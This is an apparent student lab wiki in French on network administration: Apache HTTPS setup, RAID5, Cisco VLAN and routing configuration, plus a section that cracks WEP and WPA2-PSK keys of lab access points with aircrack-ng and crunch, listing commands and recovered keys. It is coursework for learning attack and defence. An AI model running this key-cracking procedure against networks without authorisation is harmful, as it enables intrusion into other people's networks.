=== Activation du protocole SSL ===&lt;br /&gt;
Il faut activer le module qui gère le protocole SSL via la commande : &lt;br /&gt;
   a2enmode ssl&lt;br /&gt;
   service apache2 restart&lt;br /&gt;
&lt;br /&gt;
=== Configuration du VirtualHost Apache pour le protocole HTTPS ===&lt;br /&gt;
Afin de ne pas saboter la configuration HTTP déjà en place, on va dupliquer la configuration disponible dans /sites-available:&lt;br /&gt;
    cp ima2a5-rex4ever.site.conf ima2a5-rex4ever.site-ssl.conf&lt;br /&gt;
Modification :&lt;br /&gt;
   &amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
  #   General setup for the virtual host&lt;br /&gt;
     DocumentRoot &amp;quot;/var/www/ima2a5-rex4ever&amp;quot;&lt;br /&gt;
     ServerName ima2a5-rex4ever.site:443                                                                                                                                                                                                          ServerAdmin pascal.coint@polytech-lille.net                                                                                                                                                                                                  ErrorLog &amp;quot;/usr/local/apache2/logs/error_log&amp;quot;                                                                                                                                                                                                 TransferLog &amp;quot;/usr/local/apache2/logs/access_log&amp;quot;                                                                                                                                                                                          # Activation du SSL                                                                                                                                                                                                                                SSLEngine On&lt;br /&gt;
    &lt;br /&gt;
    # Activation de tous les protocoles sécurisés (TLS v1.0, v1.1 et TLS v1.2) touut en désactivant les protocoles non sécurisés (SSL v2, SSL v3)&lt;br /&gt;
    SSLProtocol All -SSLv3 -SSLv2&lt;br /&gt;
    # Le navigateur devra choisir une méthode de chiffrement en respectant l'ordre indiquée dans SSLCipherSuite&lt;br /&gt;
    SSLHonorCipherOrder on&lt;br /&gt;
    &lt;br /&gt;
    # Chemin vers le certificat SSL de votre nom de domaine&lt;br /&gt;
    SSLCertificateFile &amp;quot;/etc/apache2/certificate/ima2a5-rex4ever.cer&amp;quot;&lt;br /&gt;
    SSLCACertificateFile &amp;quot;/etc/apache2/certificate/ima2a5-rex4ever.pem&amp;quot;&lt;br /&gt;
    # Chemin vers la clée privée du certificat SSL de votre nom de domaine&lt;br /&gt;
    SSLCertificateKeyFile &amp;quot;/etc/apache2/certificate/ima2a5-rex4ever.key&amp;quot;    &lt;br /&gt;
    &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
On peut maintenant permuter les fichiers .conf et renommer notre ancien .conf en &amp;quot;ima2a5-rex4ever.site-http.conf&amp;quot;&lt;br /&gt;
'''Note :''' Comme vous aurez pu le remarquer, j'ai créer un dossier certificate dans lequel j'ai mis le .cer,le .csr,le.key et le .pem afin de ne pas les perdre.&lt;br /&gt;
On va ensuite décharger puis recharger le site :&lt;br /&gt;
   a2dissite ima2a5-rex4ever.site&lt;br /&gt;
   a2ensite ima2a5-rex4ever.site&lt;br /&gt;
   service apache2 restart&lt;br /&gt;
&lt;br /&gt;
Ensuite on va regarder quels sont nos sites actifs à l'aide de apache2ctl -S , ce qui retourne :&lt;br /&gt;
    *:80                   ima2a5-rex4ever.site (/etc/apache2/sites-enabled/000-default.conf:1)&lt;br /&gt;
    *:443                  ima2a5-rex4ever.site (/etc/apache2/sites-enabled/ima2a5-rex4ever.site.conf:13)&lt;br /&gt;
Le site est prêt pour le HTTPS&lt;br /&gt;
&lt;br /&gt;
=== Securisation du DNS : Le DNSSEC ===&lt;br /&gt;
Avoir un site sécurisé c'est bien , avoir toute la chaine de transmission pour éviter les fraude c'est encore mieux. Pour cela, il est possible de concevoir un DNSSEC (contraction de DNS SECURISED)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Attaque d'une installation Wi-fi ==&lt;br /&gt;
=== Description ===&lt;br /&gt;
Notre Client Wi-fi est un ordinateur portable fourni par Monsieur Redon. Il ne nécessite pas nécessairement de configuration. Cependant, la clef Wi-Fi fournie avec elle doit être paramétrée (la datasheet peut se trouver à l'adresse suivant ; [https://www.farnell.com/datasheets/1669935.pdf Datasheet]). De plus, il faut installer les paquetages nécessaire pour craquer la clef Wep et la clef WPA&lt;br /&gt;
&lt;br /&gt;
=== Installation du paquetage AirCrack-ng ===&lt;br /&gt;
Pour installer [https://doc.ubuntu-fr.org/aircrack-ng AirCrack] (utilitaire qui permet de casser les clefs WEP et WPA), il suffit de taper la commande :&lt;br /&gt;
    apt-get install aircrack-ng&lt;br /&gt;
'''Note:''' il faut auparavant configurer le réseau pour se connecter à internet.&lt;br /&gt;
&lt;br /&gt;
=== Utilisation de AirCrack pour clef WEP ===&lt;br /&gt;
Après avoir branché la clef WiFi, on se sert de '''airmon-ng''' qui est un utilitaire qui espionne le réseau et permet d'obtenir les types d'interfaces communicantes/espionnable.&lt;br /&gt;
   airmon-ng&lt;br /&gt;
Pour tenter de s'y connecter en tant qu'espion, il faut alors taper (nous le tapons ici avec wlan0mon):&lt;br /&gt;
   airmong-ng start NOMRESEAUESPIONNABLE&lt;br /&gt;
Puis, pour observer et découvrir les canaux associés au réseau et leurs SSID,il faut taper:&lt;br /&gt;
   airodump-ng --encrypt wep NOMRESEAUESPIONNABLE&lt;br /&gt;
Puis à l'aide d'un second terminal, on peut stocker les informations volées dans un .txt :&lt;br /&gt;
   Airodump-ng FICHIER.txt -c 2 --bssid ADDRESSBSSID NOMRESEAUESPIONNABLE&lt;br /&gt;
Ce qui donne dans notre cas : &lt;br /&gt;
   airmon-ng&lt;br /&gt;
   airmong-ng start wlan0mon&lt;br /&gt;
   airodump-ng --encrypt wep wlan0mon &lt;br /&gt;
   Airodump-ng -w reseau_1.txt -c 2 --bssid 04:DA:D2:50:53 wlan0mon   (&amp;lt;== pour le réseau cracotte 3)&lt;br /&gt;
&lt;br /&gt;
Commence alors le craquage de la clef Wifi en Wep. On estime qu'il faut capturer plus ou moins 50 000 datas pour approximer 50% de chance de craquer la clef.&lt;br /&gt;
Après 40 000 datas volées , on réussit à craquer la clef, il nous aura fallu environ '''14 minutes'''.&lt;br /&gt;
&lt;br /&gt;
    KEY FOUND! [BA:BE:EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:44:44 ]&lt;br /&gt;
    Decrypted correctly : 100%&lt;br /&gt;
&lt;br /&gt;
=== Utilisation de AirCrack pour clef WPA2-PSK ===&lt;br /&gt;
De même que précedemment, on recommence en changeant le --encrypt et on obtient :&lt;br /&gt;
   airmon-ng&lt;br /&gt;
   airmong-ng start wlan0mon&lt;br /&gt;
   airodump-ng --encrypt wpa wlan0mon &lt;br /&gt;
On obtient les informations suivantes sur notre réseau cible : &lt;br /&gt;
Channel: 2&lt;br /&gt;
SSIDName: kracotte03&lt;br /&gt;
BSSIDAdress: 04:DA:D2:9C:50:5A&lt;br /&gt;
&lt;br /&gt;
On peut alors espionner et voler des informations avec les '''handshakes''':&lt;br /&gt;
airodump-ng -w kracotte03 -c 2 --bssid 04:DA:D2:9C:50:5A&lt;br /&gt;
&lt;br /&gt;
'''-w kracotte03''' indique que l'on souhaite tout enregistrer dans un fichier nommé '''kracotte03.'''. On obtient alors après un moment les datas volées et les informations sont extraites sous plusieurs formats. &lt;br /&gt;
Le format '''.cap''' est compatible avec l'utilitaire que nous allons utiliser, on le copie donc sur une clef USB et on va cracker la clef sur une zabeth (vitesse de calcul plus elevée).&lt;br /&gt;
Pour se faire , on construit un dictionnaire (ensemble possible de toutes les combinaisons) avec l'utilitaire Crunch via la commande :&lt;br /&gt;
   crunch 8 8 123456789 &amp;gt;&amp;gt; Dico.txt &lt;br /&gt;
Notre dictionnaire est largement simplifié car nous sommes au courant qu'il s'agit d'un ensemble de 8 chiffres de 1 a 9 , ce qui permet de préciser à crunch une taille min et max de 8 et les caractères admissibles de 1 à 9&lt;br /&gt;
Le dictionnaire est maintenant prêt, on lance alors le cassage de clef par force brute :&lt;br /&gt;
aircrack-ng psk-01.cap -w Dico.txt&lt;br /&gt;
&lt;br /&gt;
Après TREEEEEEEEEEEEEEEEEEEEEEEEEEEEEES Longtemps , on obtient la clef :&lt;br /&gt;
      [00:21:41] 10233332/102795810 keys tested (7985.18 k/s) &lt;br /&gt;
      &lt;br /&gt;
      Time left: 3 hours, 13 minutes, 12 seconds                 9.96%&lt;br /&gt;
                           KEY FOUND! [ 10233333 ]&lt;br /&gt;
      Master Key     : 5A D9 A4 39 7A 4E 14 A6 44 DE C4 AB FF 1E 63 D7 &lt;br /&gt;
                       46 7B F8 02 23 ED EA A9 82 3F 6A FC 68 DE F2 5D &lt;br /&gt;
      Transient Key  : 29 DA 59 3B EC 25 DB 6A 62 AD 50 2C 17 52 BC F8 &lt;br /&gt;
                       C9 CD 7C 85 A5 07 7E 44 84 B5 A6 EB 2E 47 B3 D0 &lt;br /&gt;
                       1C CC CC F8 24 EB 00 0A C0 7B B8 60 13 AE 57 74 &lt;br /&gt;
                       1E 15 A9 FC D7 A8 E5 C6 14 9B 01 60 E4 C4 96 43 &lt;br /&gt;
      EAPOL HMAC     : 15 99 D7 E0 33 B3 E1 4C 57 6F 8E E4 69 AF B0 08&lt;br /&gt;
&lt;br /&gt;
== Diverses commandes ==&lt;br /&gt;
=== Creation du Raid5 avec mdadm ===&lt;br /&gt;
Nous commencons par créer un RAID5 comme demandé dans la partie 6.1 du sujet. Pour se faire on commence par créer 3 disques de 1Go chacun:&lt;br /&gt;
   root@cordouan:~# lvcreate -L1G -n ima2a5-rex4ever-disk1 virtual&lt;br /&gt;
   root@cordouan:~# lvcreate -L1G -n ima2a5-rex4ever-disk2 virtual&lt;br /&gt;
   root@cordouan:~# lvcreate -L1G -n ima2a5-rex4ever-disk3 virtual&lt;br /&gt;
On éteint la machine et on recommence la même manipulation que pour la partie 3.5.1 du wiki pour attacher disk1,disk2 et disk3.&lt;br /&gt;
Nos 3 disques sont maintenant reliées à notre machine comme on le peut voir avec la commande '''fdisk -l'''&lt;br /&gt;
&lt;br /&gt;
   Disk /dev/xvdb3: 1 GiB, 1073741824 bytes, 2097152 sectors&lt;br /&gt;
   Units: sectors of 1 * 512 = 512 bytes&lt;br /&gt;
   Sector size (logical/physical): 512 bytes / 512 bytes&lt;br /&gt;
   I/O size (minimum/optimal): 512 bytes / 512 bytes&lt;br /&gt;
   &lt;br /&gt;
   Disk /dev/xvdb4: 1 GiB, 1073741824 bytes, 2097152 sectors&lt;br /&gt;
   Units: sectors of 1 * 512 = 512 bytes&lt;br /&gt;
   Sector size (logical/physical): 512 bytes / 512 bytes&lt;br /&gt;
   I/O size (minimum/optimal): 512 bytes / 512 bytes&lt;br /&gt;
   &lt;br /&gt;
   Disk /dev/xvdb5: 1 GiB, 1073741824 bytes, 2097152 sectors&lt;br /&gt;
   Units: sectors of 1 * 512 = 512 bytes&lt;br /&gt;
   Sector size (logical/physical): 512 bytes / 512 bytes&lt;br /&gt;
   I/O size (minimum/optimal): 512 bytes / 512 bytes&lt;br /&gt;
&lt;br /&gt;
On nous propose de réaliser le raid5 logiciel avec l'utilitaire mdadm ([https://doc.ubuntu-fr.org/raid_logiciel mdadm])&lt;br /&gt;
Assemblons maintenant nos 3 disques en un RAID5 via la commande : &lt;br /&gt;
   mdadm --create /dev/md0 --level=5  --raid-devices=3 /dev/xvdb3 /dev/xvdb4 /dev/xvdb5&lt;br /&gt;
'''Note:''' Ne pas essayer de renommer md0&lt;br /&gt;
Pour automatiser le raid5 à chaque démarrage: &lt;br /&gt;
   mdadm --monitor --daemonise /dev/md0&lt;br /&gt;
Puis le formatage du volume RAID nouvellement créé:&lt;br /&gt;
   mkfs.ext4 /dev/md0&lt;br /&gt;
Déclarez ce volume dans `fstab` pour que le système le monte au démarrage (le système de fichier, pas le volume en lui même). Pour ce faire Editez le fichier /etc/fstab et ajoutez à sa fin la ligne :&lt;br /&gt;
   /dev/md0 	/media/raid	ext4	defaults 	0	1&lt;br /&gt;
Puis créer le fichier /media/raid qui est le fichier sur lequel le raid est monté : &lt;br /&gt;
   mkdir /media/raid&lt;br /&gt;
En retirant un disque (mise en commentaire /etc/fstab), le disque md0 est toujours actif et utilisable.&lt;br /&gt;
&lt;br /&gt;
=== Cryptage de données ===&lt;br /&gt;
&lt;br /&gt;
=== Réseau WPA2-EAK ===&lt;br /&gt;
&lt;br /&gt;
== Architecture Réseau ==&lt;br /&gt;
&lt;br /&gt;
Dans cette partie, vous trouverez comment nous avons configuré les routeurs ainsi que les commutateurs qui se trouve dans les salles E304 et E306.&lt;br /&gt;
&lt;br /&gt;
=== Configuration des 2 commutateurs ===&lt;br /&gt;
&lt;br /&gt;
===== Connexion =====&lt;br /&gt;
&lt;br /&gt;
Pour accéder au commutateur, nous avons utilisé minicom avec un cable série directement branché sur la prise console du commutateur :&lt;br /&gt;
&lt;br /&gt;
    minicom -os ( avec '''ttyUSB0''', une vitesse de transfert de '''9600 bauds''' et le '''flow control désactivé''')     // les paramètres sont modifiable directement depuis les options de minicom&lt;br /&gt;
&lt;br /&gt;
===== Commande de base =====&lt;br /&gt;
&lt;br /&gt;
Voici quelque commandes de base qui nous ont servi pour la configuration des commutateurs&lt;br /&gt;
&lt;br /&gt;
    enable           // passage en admin pour pouvoir accéder aux données du commutateur&lt;br /&gt;
    write            // Sauvegarde de la configuration et l’implanter dans le commutateur&lt;br /&gt;
    show interface status OU sh int status  // Montre l'état de toutes les interfaces présentes sur le commutateur ainsi que les données associées&lt;br /&gt;
    configuration terminal    // permets d'accéder aux interfaces et ainsi pouvoir les modifier&lt;br /&gt;
    exit             // permets de sortir du configurateur actuel (par exemple sortir de l'interface)&lt;br /&gt;
&lt;br /&gt;
==== Configuration des ports du commutateur =====&lt;br /&gt;
&lt;br /&gt;
Nous avons 4 connexions qui sont dirigées vers le commutateur de la salle E304 ainsi que celui en E306&lt;br /&gt;
 - Un lien vers le routeur&lt;br /&gt;
 - Un lien vers la borne wifi&lt;br /&gt;
 - Un lien vers Corduan&lt;br /&gt;
 - Un lien vers l'autre commutateur&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 85%;margin: auto;&amp;quot;&lt;br /&gt;
! Connexion !! E304 !! E306&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Corduan&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Borne Wifi&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Commutateur&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Router&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour la borne wifi =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal (ou conf t)&lt;br /&gt;
    interface XXXX (ou int XXXX)&lt;br /&gt;
    switchport    //Rendre accessible la modification du port&lt;br /&gt;
    switchport trunk encapsulation dot1q   //Encapsule avec la trame le numéro du Vlan associé, ce qui permettra de d'avoir de quel équipement viens le paquet ainsi la réponse sera dirigé vers le bon port&lt;br /&gt;
    switchport mode trunk   //Configure le port du switch en mode trunk, ce qui permets de ne pas avoir de restriction sur les Vlan, tous les Vlan peuvent passer à travers ce port&lt;br /&gt;
    no shut    //Démarre le port ou de le garder actif&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour Corduan =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal&lt;br /&gt;
    interface XXXX&lt;br /&gt;
    switchport&lt;br /&gt;
    switchport mode access //Rendre modifiable le port&lt;br /&gt;
    switchport access vlan42 //Autoriser le vlan 42 à transister à travers ce port&lt;br /&gt;
    no shutdown&lt;br /&gt;
    exit&lt;br /&gt;
    exit &lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour le router =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal (ou conf t)&lt;br /&gt;
    interface XXXX (ou int XXXX)&lt;br /&gt;
    switchport    &lt;br /&gt;
    switchport trunk encapsulation dot1q   &lt;br /&gt;
    switchport mode trunk  &lt;br /&gt;
    no shut    &lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour l'autre commutateur =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal (ou conf t)&lt;br /&gt;
    interface XXXX (ou int XXXX)&lt;br /&gt;
    switchport    &lt;br /&gt;
    switchport trunk encapsulation dot1q   &lt;br /&gt;
    switchport mode trunk  &lt;br /&gt;
    no shut    &lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
===== Création des Vlan =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    conf t&lt;br /&gt;
    vlan 42&lt;br /&gt;
    name Corduan&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    conf t&lt;br /&gt;
    vlan 2 à 7&lt;br /&gt;
    name groupe 1 à 6&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    conf t&lt;br /&gt;
    vlan 130&lt;br /&gt;
    name interconnexion&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
Pour supprimer un vlan il suffit de faire :&lt;br /&gt;
    no vlan X&lt;br /&gt;
&lt;br /&gt;
=== Configuration du router E304 ===&lt;br /&gt;
&lt;br /&gt;
===== Connexion =====&lt;br /&gt;
&lt;br /&gt;
Pour accéder au routeur, nous avons utilisé minicom avec un USB directement branché sur la prise console du commutateur :&lt;br /&gt;
&lt;br /&gt;
    minicom -os ( avec '''ttyACM0''', une vitesse de transfert de '''9600 bauds''' et le ''''flow control désactivé''')     // les paramètres sont modifiable directement depuis les options de minicom&lt;br /&gt;
&lt;br /&gt;
===== Commande de base =====&lt;br /&gt;
&lt;br /&gt;
Ce sont exactement les mêmes que celles utilisées pour les commutateurs&lt;br /&gt;
&lt;br /&gt;
==== Configuration des ports ====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
======  Vers les commutateurs ======&lt;br /&gt;
&lt;br /&gt;
La configuration est la même pour les 2 ports correspondant aux commutateurs&lt;br /&gt;
Nous avons besoin de 6 Vlan pour nos groupes et d'un Vlan d'interconnexion&lt;br /&gt;
&lt;br /&gt;
  enable                                                  &lt;br /&gt;
 &lt;br /&gt;
  configure terminal&lt;br /&gt;
 &lt;br /&gt;
  interface XXXX                         &lt;br /&gt;
  no ip address                            //Pas d'addresse IP associé&lt;br /&gt;
  negotiation auto                         //Détermine automatiquement la vitesse de transfert&lt;br /&gt;
  media-type RJ45                          //Type de connexion (ici RJ45)&lt;br /&gt;
&lt;br /&gt;
Voici les vlan associé à nos groupes :&lt;br /&gt;
 &lt;br /&gt;
  service instance 2 ethernet              // création d'un vlan 2 dans cette interface&lt;br /&gt;
  encapsulation dot1q 2                    // Permets d'assurer une continuité d'un VLAN issue d'un switch sur un routeur via un lien trunk&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric      // retire le tag du vlan &lt;br /&gt;
  bridge-domain 2                          //création d'un bridge domaine interface (BDI) attribué au chiffre 2&lt;br /&gt;
    &lt;br /&gt;
  service instance 3 ethernet&lt;br /&gt;
  encapsulation dot1q 3&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 3&lt;br /&gt;
    &lt;br /&gt;
  service instance 4 ethernet&lt;br /&gt;
  encapsulation dot1q 4&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 4&lt;br /&gt;
  &lt;br /&gt;
  service instance 5 ethernet&lt;br /&gt;
  encapsulation dot1q 5&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 5&lt;br /&gt;
    &lt;br /&gt;
  service instance 6 ethernet&lt;br /&gt;
  encapsulation dot1q 6&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 6&lt;br /&gt;
  &lt;br /&gt;
  service instance 7 ethernet&lt;br /&gt;
  encapsulation dot1q 7&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 7&lt;br /&gt;
&lt;br /&gt;
Voici le vlan associé à l'interconnexion :&lt;br /&gt;
 &lt;br /&gt;
  service instance 42 ethernet&lt;br /&gt;
  encapsulation dot1q 42&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 42&lt;br /&gt;
&lt;br /&gt;
======  Vers le SR 32 ======&lt;br /&gt;
  interface XXXX                        &lt;br /&gt;
  no ip address&lt;br /&gt;
  negotiation auto&lt;br /&gt;
  service instance 130 ethernet&lt;br /&gt;
  encapsulation dot1q 130&lt;br /&gt;
  bridge-domain 130&lt;br /&gt;
   &lt;br /&gt;
&lt;br /&gt;
===== Configuration des BDI =====&lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
   interface BDI2&lt;br /&gt;
   ip address 10.60.1.254 255.255.255.000           //Attribut l'addresse IPV4 pour le routeur ainsi que son mask&lt;br /&gt;
   standby version 2                                //Activation du HSRP (Host service Routing protocole) version 2 plus stable que la 1&lt;br /&gt;
   standby 3 ip 10.60.1.252                       //Donne l'addresse  IPV4 du routeur virtuelle pour le HSRP                             &lt;br /&gt;
   standby 3 preempt                              // Activation du HSRP         &lt;br /&gt;
   ipv6 address 2001:660:4401:60B3::/64 eui-64      //Attribut l'addresse IPV6                             &lt;br /&gt;
   ipv6 enable                                      //Active l'addressage IPV6                              &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B3::/64 1000 900  //Donner un préfixe IPV6 à chaque machine                              &lt;br /&gt;
   ipv6 nd router-preference high                    //IPV6 sera la route de préférence par défaut avec une forte probabilitée&lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI3&lt;br /&gt;
   ip address 10.60.2.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 3 ip 10.60.2.252                                                     &lt;br /&gt;
   standby 3 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B3::/64 eui-64                                   &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B3::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit                       &lt;br /&gt;
   &lt;br /&gt;
   interface BDI4&lt;br /&gt;
   ip address 10.60.3.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 4 ip 10.60.3.252                                                     &lt;br /&gt;
   standby 4 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B4::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B4::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                   &lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI5&lt;br /&gt;
   ip address 10.60.4.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 5 ip 10.60.4.252                                                    &lt;br /&gt;
   standby 5 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B5::/64 eui-64                                   &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B5::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                   &lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI6&lt;br /&gt;
   ip address 10.60.5.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 6 ip 10.60.5.252                                                      &lt;br /&gt;
   standby 6 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B6::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B6::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit  &lt;br /&gt;
   &lt;br /&gt;
   interface BDI7&lt;br /&gt;
   ip address 10.60.6.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 6 ip 10.60.6.252                                                      &lt;br /&gt;
   standby 6 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B7::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B7::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit                                 &lt;br /&gt;
 &lt;br /&gt;
   interface BDI42&lt;br /&gt;
   ip address 193.48.57.173 255.255.255.240         &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 7 ip 193.48.57.172                                                     &lt;br /&gt;
   standby 7 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B1::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B1::/64 1000 900                               &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI130&lt;br /&gt;
   ip address 192.168.222.1 255.255.255.248                      &lt;br /&gt;
   ipv6 address FE80::42:2 link-local                                         &lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   &lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV4 ====&lt;br /&gt;
&lt;br /&gt;
Se le faire expliquer parce que rien compris &lt;br /&gt;
&lt;br /&gt;
   configure terminal&lt;br /&gt;
   router ospf 1        //création d'un opsf (Open Shortest Path First)                                      &lt;br /&gt;
   router-id 10.60.0.1   //Doute voir avec Redon !&lt;br /&gt;
   log-adjacency-changes&lt;br /&gt;
   summary address 193.48.57.160 255.255.255.240 //donne l'addresse IP la plus base du réseau routé&lt;br /&gt;
   summary-address 10.60.0.1 255.255.0.0 not-advertise //donne l'addresse Ip la plus base du réseau non routé/ privé&lt;br /&gt;
   redistribute connected subnets&lt;br /&gt;
   network 192.168.222.8 0.0.0.7 area 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV6 ====&lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
   ipv6 router rip tpima2a5                 //Création d'une route IPV6 sous le nom tpima2a5&lt;br /&gt;
   redistribute connected metric 1&lt;br /&gt;
   redistribute rip 1 metric 1&lt;br /&gt;
   redistribute static metric 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation du réseau ====&lt;br /&gt;
&lt;br /&gt;
Question pour Redon addresse Ip à définir &lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
   int XXXX&lt;br /&gt;
   ip address 10.10.10.2 255.255.255.0&lt;br /&gt;
   vrrp 1 ip 10.10.10.3                     &lt;br /&gt;
   vrrp 1 preempt                          //Activation de la préemption, si jamais le routeur tombe en panne, l'autre prend sa place&lt;br /&gt;
   vrrp 1 priority 100                     //Dans le vvrp n°1 on définit la priorité à 100, plus la priorité est élevé plus il sera sollicité&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Configuration du router E306 ===&lt;br /&gt;
&lt;br /&gt;
===== Connexion =====&lt;br /&gt;
&lt;br /&gt;
Pour accéder au routeur, nous avons utilisé minicom avec un USB directement branché sur la prise console du commutateur :&lt;br /&gt;
&lt;br /&gt;
    minicom -os ( avec '''ttyUSB0''', une vitesse de transfert de '''9600 bauds''' et le ''''flow control désactivé''')     // les paramètres sont modifiable directement depuis les options de minicom&lt;br /&gt;
&lt;br /&gt;
===== Commande de base =====&lt;br /&gt;
&lt;br /&gt;
Ce sont exactement les mêmes que celles utilisées pour les commutateurs&lt;br /&gt;
&lt;br /&gt;
==== Configuration des ports ====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
======  Vers les commutateurs ======&lt;br /&gt;
&lt;br /&gt;
La configuration est la même pour les 2 ports correspondant aux commutateurs&lt;br /&gt;
Nous avons besoin de 6 Vlan pour nos groupes et d'un Vlan d'interconnexio&lt;br /&gt;
&lt;br /&gt;
*******************************************************************************&lt;br /&gt;
&lt;br /&gt;
*******************************************************************************&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV4 ====&lt;br /&gt;
&lt;br /&gt;
Se le faire expliquer parce que rien compris &lt;br /&gt;
&lt;br /&gt;
